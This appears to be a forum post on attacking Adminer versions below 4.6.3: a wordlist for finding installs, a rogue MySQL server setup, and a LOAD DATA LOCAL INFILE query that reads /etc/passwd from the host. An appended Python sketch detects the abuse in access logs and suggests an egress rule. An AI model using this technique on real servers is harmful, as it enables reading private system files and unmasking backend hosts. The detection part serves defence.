
What it is and where to go

#00 SI9INT, 40 •

2019-05-04

This works only for Adminer versions < 4.6.3.

An Adminer script can be discovered on a web server either by using the following word list (containing all official file names since v3.0.0) or by searching for a renamed version (file name e.g. "connect.php") whose HTTP response body contains "<title>Login - Adminer</title>":
https://raw.githubusercontent.com/kaimi-io/web-fuzz-wordlists/master/adminer.txt

The attack requires setting up a MySQL server with a public IP address. The external Adminer script can then be used in combination with the owned IP address (instead of the default value "localhost" in the "Server" field). Log in and read local files:
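LOAD DATA LOCAL INFILE '/etc/passwd'
INTO TABLE test.test
FIELDS TERMINATED BY "\n";

(test.test = table.row)

Because of the LOCAL keyword, the file is read on the host running Adminer (which acts as the MySQL client) and its contents are sent to the connected server. This kind of "back-connection" can also be used to expose a backend IP address, bypassing a frontend proxy/CDN.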
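
A detection sketch for the "Server" field abuse described above, added here as an example and not part of the original post: it flags access-log requests whose Adminer-style query string names a database server outside the internal ranges. It assumes that, after login, Adminer carries the chosen server in a "server" parameter next to "username"; the log lines and INTERNAL_NETS are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines for illustration, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/May/2019:10:00:01 +0000] "GET /adminer.php?username=root&db=shop HTTP/1.1" 200 5120
198.51.100.7 - - [04/May/2019:10:00:09 +0000] "GET /connect.php?server=203.0.113.50&username=u&db=test HTTP/1.1" 200 4811
10.0.0.5 - - [04/May/2019:10:01:00 +0000] "GET /adminer.php?server=10.0.0.20%3A3306&username=app HTTP/1.1" 200 4990
198.51.100.9 - - [04/May/2019:10:02:00 +0000] "GET /tools/db.php?server=db.example.net&username=u&sql= HTTP/1.1" 200 5003
198.51.100.9 - - [04/May/2019:10:03:00 +0000] "GET /search?server=eu1 HTTP/1.1" 200 100
"""

# Assumption: networks where your own database servers live; adjust per site.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "::1/128")]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')

def is_internal_server(value):
    """True if the Adminer "Server" value is localhost or an internal IP."""
    host = value.strip()
    if host.startswith("["):            # bracketed IPv6, optional port
        host = host[1:].split("]")[0]
    elif host.count(":") == 1:          # host:port
        host = host.split(":")[0]
    if host in ("", "localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                    # hostname: not provably internal, report it
    return any(ip in net for net in INTERNAL_NETS)

def external_server_requests(log_text):
    """Return (client, path, server) for Adminer-style requests to outside servers."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)
        # Assumed Adminer URL shape after login: ?server=<host>&username=<user>...
        # Matching on parameters, not file name, also catches renamed copies.
        if "server" in query and "username" in query:
            if not is_internal_server(query["server"][0]):
                hits.append((client, url.path, query["server"][0]))
    return hits
```

Hostnames are reported on purpose, since a name cannot be shown to be internal from the log alone; pair the alert with an egress rule that blocks outbound MySQL connections from web servers.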


Greetz @YS | Source:
https://noreferrer.org/?https://twitter.com/spazef0rze/status/1086703365357273093
https://noreferrer.org/?https://medium.com/bugbountywriteup/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f